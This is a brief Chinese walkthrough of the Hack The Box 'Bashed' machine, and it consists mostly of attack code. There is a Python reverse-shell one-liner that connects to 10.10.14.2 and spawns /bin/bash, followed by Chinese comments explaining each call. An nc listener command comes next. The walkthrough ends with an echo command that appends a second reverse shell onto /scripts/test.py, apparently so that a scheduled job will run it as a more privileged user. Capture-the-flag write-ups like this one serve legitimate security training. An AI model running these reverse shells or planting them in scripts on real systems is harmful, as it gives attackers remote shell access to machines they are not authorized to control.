HTB靶场系列之Bashed通关攻略

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket. SOCK_STREAM);s.settimeout(10);s.connect(("10.10.14.2",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

import socket,subprocess,os  #导入python socket、subprocess、os库s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)  #使用socket函数创建一个套接字，AF_INET表示是一个IPv4的套接字，SOCK_STREAM表示使用TCP流式sockets.settimeout(10)#控制时延，防止因为国内访问国外过高的延时导致tcp不能建立连接s.connect(("10.10.14.2",4444))  #连接到10.10.14.2:4444处的套接字os.dup2(s.fileno(),0)os.dup2(s.fileno(),1)os.dup2(s.fileno(),2)#os.dup2() 方法用于将一个文件描述符 fd 复制到另一个 fd2。#而fileno()函数就是返回一个文件的文件描述符#在linux中系统对于文件的操作是根据文件描述符来决定的，文件描述符是一个比较小的大于等于3的整数，0表示标准输入stdin，1表示标准输出stdout，2表示标准错误输出stderr#所以上面的函数作用就是把stdin,stdout,stderr的内容替换为套接字返回的内容，所以在本机nc监听就会创建一个套接字进程，使得在本地输入的内容就直接作为宿主机的stdin，stdout的内容也会在本地显示import pty;pty.spawn("/bin/bash")# pty 模块定义了一些处理“伪终端”概念的操作：启动另一个进程并能以程序方式在其控制终端中进行读写。当我们远程到主机时需要一个终端进行交互，pty用于生成提供交互的虚拟终端。

nc -vlnp 4444

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket. SOCK_STREAM);s.settimeout(10);s.connect(("10.10.14.2",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' >> /scripts/test.py